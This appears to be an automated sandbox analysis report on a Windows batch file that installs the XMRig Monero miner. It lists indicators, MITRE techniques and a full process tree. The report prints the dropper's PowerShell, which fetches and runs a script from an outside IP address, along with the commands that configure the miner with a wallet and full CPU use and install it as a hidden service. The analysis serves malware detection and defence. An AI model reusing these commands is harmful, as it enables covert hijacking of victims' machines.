xmrig | 9646675a0d5cb5ccf4aa9408fc698bf5d020d27015c69c9c1ab0e2290137fdd5

Analysis

max time kernel
99s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
01/07/2024, 21:04 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3039790984737.bat
Size

524B
MD5

92b307667679cc4bca93a2417be6137b
SHA1

5347620d753e52dbd274d04ae87356e09fe1c16d
SHA256

9646675a0d5cb5ccf4aa9408fc698bf5d020d27015c69c9c1ab0e2290137fdd5
SHA512

d99751550c337010791b8522ce1966384b41b2f17d6bfaf89034ce9ef25e2648e99ce5b345c6858c79b7af65b357036b42ed88447bca5854644d12ce9cf8a791

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

1
$wc = new-object system.net.webclient
2
$tempfile = [system.io.path]::gettempfilename()
3
$tempfile = ".bat"
4
$wc.downloadfile("http://185.254.97.190:2024/test.txt", ".bat")
5
.bat 42 crnhwckm6bmza8jmwyvwb2tjacxqgmj1qhhj9ae55qrx488q6cvau42ekkeied2n9te1ujnviusnvqv1nj17r79fdhjvl
6
remove-item -force $tempfile
7

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

1
$wc = new-object system.net.webclient
2
$wc.downloadfile("https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip", "C:\\Users\\Admin\\xmrig.zip")
3

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

1
$wc = new-object system.net.webclient
2
$wc.downloadfile("https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip", "C:\\Users\\Admin\\nssm.zip")
3

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral2/files/0x0008000000023251-66.dat	family_xmrig
behavioral2/files/0x0008000000023251-66.dat	xmrig
behavioral2/memory/2280-68-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3968-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	2076	powershell.exe
5	2624	powershell.exe
22	4688	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
2280	xmrig.exe
2208	nssm.exe
2632	nssm.exe
3612	nssm.exe
1996	nssm.exe
2228	nssm.exe
4044	nssm.exe
3492	nssm.exe
3968	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
22	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1640	sc.exe
868	sc.exe
2928	sc.exe
1988	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4392	powershell.exe
2936	powershell.exe
1728	powershell.exe
3168	powershell.exe
3660	powershell.exe
3652	powershell.exe
3504	powershell.exe
2624	powershell.exe
2568	powershell.exe
2076	powershell.exe
4540	powershell.exe
4688	powershell.exe
1956	powershell.exe

Delays execution with timeout.exe 46 IoCs

evasion

pid	Process
1768	timeout.exe
2340	timeout.exe
2280	timeout.exe
3360	timeout.exe
2300	timeout.exe
1064	timeout.exe
3512	timeout.exe
1588	timeout.exe
832	timeout.exe
3612	timeout.exe
4612	timeout.exe
4632	timeout.exe
4520	timeout.exe
4524	timeout.exe
908	timeout.exe
2876	timeout.exe
1356	timeout.exe
1300	timeout.exe
2680	timeout.exe
4984	timeout.exe
3776	timeout.exe
4144	timeout.exe
1664	timeout.exe
4540	timeout.exe
412	timeout.exe
4612	timeout.exe
3380	timeout.exe
3484	timeout.exe
4580	timeout.exe
2872	timeout.exe
1020	timeout.exe
2276	timeout.exe
4032	timeout.exe
836	timeout.exe
1056	timeout.exe
3660	timeout.exe
864	timeout.exe
4068	timeout.exe
1468	timeout.exe
4420	timeout.exe
3776	timeout.exe
2556	timeout.exe
4496	timeout.exe
3992	timeout.exe
184	timeout.exe
2320	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2340	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2076	powershell.exe
2076	powershell.exe
2624	powershell.exe
2624	powershell.exe
2624	powershell.exe
1956	powershell.exe
1956	powershell.exe
1956	powershell.exe
1728	powershell.exe
1728	powershell.exe
1728	powershell.exe
4540	powershell.exe
4540	powershell.exe
4540	powershell.exe
3168	powershell.exe
3168	powershell.exe
3168	powershell.exe
3660	powershell.exe
3660	powershell.exe
3660	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2936	powershell.exe
2936	powershell.exe
2936	powershell.exe
3652	powershell.exe
3652	powershell.exe
3652	powershell.exe
3504	powershell.exe
3504	powershell.exe
3504	powershell.exe
4688	powershell.exe
4688	powershell.exe
4688	powershell.exe
4392	powershell.exe
4392	powershell.exe
4392	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2076	powershell.exe
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeLockMemoryPrivilege	3968	xmrig.exe
Token: SeIncreaseQuotaPrivilege	4508	WMIC.exe
Token: SeSecurityPrivilege	4508	WMIC.exe
Token: SeTakeOwnershipPrivilege	4508	WMIC.exe
Token: SeLoadDriverPrivilege	4508	WMIC.exe
Token: SeSystemProfilePrivilege	4508	WMIC.exe
Token: SeSystemtimePrivilege	4508	WMIC.exe
Token: SeProfSingleProcessPrivilege	4508	WMIC.exe
Token: SeIncBasePriorityPrivilege	4508	WMIC.exe
Token: SeCreatePagefilePrivilege	4508	WMIC.exe
Token: SeBackupPrivilege	4508	WMIC.exe
Token: SeRestorePrivilege	4508	WMIC.exe
Token: SeShutdownPrivilege	4508	WMIC.exe
Token: SeDebugPrivilege	4508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4508	WMIC.exe
Token: SeRemoteShutdownPrivilege	4508	WMIC.exe
Token: SeUndockPrivilege	4508	WMIC.exe
Token: SeManageVolumePrivilege	4508	WMIC.exe
Token: 33	4508	WMIC.exe
Token: 34	4508	WMIC.exe
Token: 35	4508	WMIC.exe
Token: 36	4508	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4508	WMIC.exe
Token: SeSecurityPrivilege	4508	WMIC.exe
Token: SeTakeOwnershipPrivilege	4508	WMIC.exe
Token: SeLoadDriverPrivilege	4508	WMIC.exe
Token: SeSystemProfilePrivilege	4508	WMIC.exe
Token: SeSystemtimePrivilege	4508	WMIC.exe
Token: SeProfSingleProcessPrivilege	4508	WMIC.exe
Token: SeIncBasePriorityPrivilege	4508	WMIC.exe
Token: SeCreatePagefilePrivilege	4508	WMIC.exe
Token: SeBackupPrivilege	4508	WMIC.exe
Token: SeRestorePrivilege	4508	WMIC.exe
Token: SeShutdownPrivilege	4508	WMIC.exe
Token: SeDebugPrivilege	4508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4508	WMIC.exe
Token: SeRemoteShutdownPrivilege	4508	WMIC.exe
Token: SeUndockPrivilege	4508	WMIC.exe
Token: SeManageVolumePrivilege	4508	WMIC.exe
Token: 33	4508	WMIC.exe
Token: 34	4508	WMIC.exe
Token: 35	4508	WMIC.exe
Token: 36	4508	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2080	WMIC.exe
Token: SeSecurityPrivilege	2080	WMIC.exe
Token: SeTakeOwnershipPrivilege	2080	WMIC.exe
Token: SeLoadDriverPrivilege	2080	WMIC.exe
Token: SeSystemProfilePrivilege	2080	WMIC.exe
Token: SeSystemtimePrivilege	2080	WMIC.exe
Token: SeProfSingleProcessPrivilege	2080	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3968	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 536 wrote to memory of 2076	536	cmd.exe	92
PID 536 wrote to memory of 2076	536	cmd.exe	92
PID 2076 wrote to memory of 4088	2076	powershell.exe	93
PID 2076 wrote to memory of 4088	2076	powershell.exe	93
PID 4088 wrote to memory of 1428	4088	cmd.exe	94
PID 4088 wrote to memory of 1428	4088	cmd.exe	94
PID 1428 wrote to memory of 3612	1428	net.exe	95
PID 1428 wrote to memory of 3612	1428	net.exe	95
PID 4088 wrote to memory of 2316	4088	cmd.exe	96
PID 4088 wrote to memory of 2316	4088	cmd.exe	96
PID 4088 wrote to memory of 3608	4088	cmd.exe	97
PID 4088 wrote to memory of 3608	4088	cmd.exe	97
PID 4088 wrote to memory of 1476	4088	cmd.exe	98
PID 4088 wrote to memory of 1476	4088	cmd.exe	98
PID 4088 wrote to memory of 1640	4088	cmd.exe	99
PID 4088 wrote to memory of 1640	4088	cmd.exe	99
PID 4088 wrote to memory of 5016	4088	cmd.exe	100
PID 4088 wrote to memory of 5016	4088	cmd.exe	100
PID 4088 wrote to memory of 2928	4088	cmd.exe	101
PID 4088 wrote to memory of 2928	4088	cmd.exe	101
PID 4088 wrote to memory of 868	4088	cmd.exe	102
PID 4088 wrote to memory of 868	4088	cmd.exe	102
PID 4088 wrote to memory of 2340	4088	cmd.exe	103
PID 4088 wrote to memory of 2340	4088	cmd.exe	103
PID 4088 wrote to memory of 2624	4088	cmd.exe	105
PID 4088 wrote to memory of 2624	4088	cmd.exe	105
PID 4088 wrote to memory of 1956	4088	cmd.exe	106
PID 4088 wrote to memory of 1956	4088	cmd.exe	106
PID 4088 wrote to memory of 1728	4088	cmd.exe	107
PID 4088 wrote to memory of 1728	4088	cmd.exe	107
PID 4088 wrote to memory of 2280	4088	cmd.exe	108
PID 4088 wrote to memory of 2280	4088	cmd.exe	108
PID 4088 wrote to memory of 1616	4088	cmd.exe	109
PID 4088 wrote to memory of 1616	4088	cmd.exe	109
PID 1616 wrote to memory of 4540	1616	cmd.exe	110
PID 1616 wrote to memory of 4540	1616	cmd.exe	110
PID 4540 wrote to memory of 1420	4540	powershell.exe	111
PID 4540 wrote to memory of 1420	4540	powershell.exe	111
PID 4088 wrote to memory of 3168	4088	cmd.exe	112
PID 4088 wrote to memory of 3168	4088	cmd.exe	112
PID 4088 wrote to memory of 3660	4088	cmd.exe	113
PID 4088 wrote to memory of 3660	4088	cmd.exe	113
PID 4088 wrote to memory of 2568	4088	cmd.exe	114
PID 4088 wrote to memory of 2568	4088	cmd.exe	114
PID 4088 wrote to memory of 2936	4088	cmd.exe	115
PID 4088 wrote to memory of 2936	4088	cmd.exe	115
PID 4088 wrote to memory of 3652	4088	cmd.exe	116
PID 4088 wrote to memory of 3652	4088	cmd.exe	116
PID 4088 wrote to memory of 3504	4088	cmd.exe	117
PID 4088 wrote to memory of 3504	4088	cmd.exe	117
PID 4088 wrote to memory of 4688	4088	cmd.exe	118
PID 4088 wrote to memory of 4688	4088	cmd.exe	118
PID 4088 wrote to memory of 4392	4088	cmd.exe	119
PID 4088 wrote to memory of 4392	4088	cmd.exe	119
PID 4088 wrote to memory of 1640	4088	cmd.exe	121
PID 4088 wrote to memory of 1640	4088	cmd.exe	121
PID 4088 wrote to memory of 1988	4088	cmd.exe	122
PID 4088 wrote to memory of 1988	4088	cmd.exe	122
PID 4088 wrote to memory of 2208	4088	cmd.exe	123
PID 4088 wrote to memory of 2208	4088	cmd.exe	123
PID 4088 wrote to memory of 2632	4088	cmd.exe	124
PID 4088 wrote to memory of 2632	4088	cmd.exe	124
PID 4088 wrote to memory of 3612	4088	cmd.exe	145
PID 4088 wrote to memory of 3612	4088	cmd.exe	145

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3039790984737.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1B05.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1428
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:3612
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:2316
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:3608
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:1476
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:1640
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:5016
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2928
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:868
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1728
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:2280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1616
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4540
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:1420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Oailvcny\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4392
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1640
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1988
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:2208
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:2632
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:3612
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:1996
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:2228
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4508
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2340
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2252
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3132
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1268
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2724
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4844
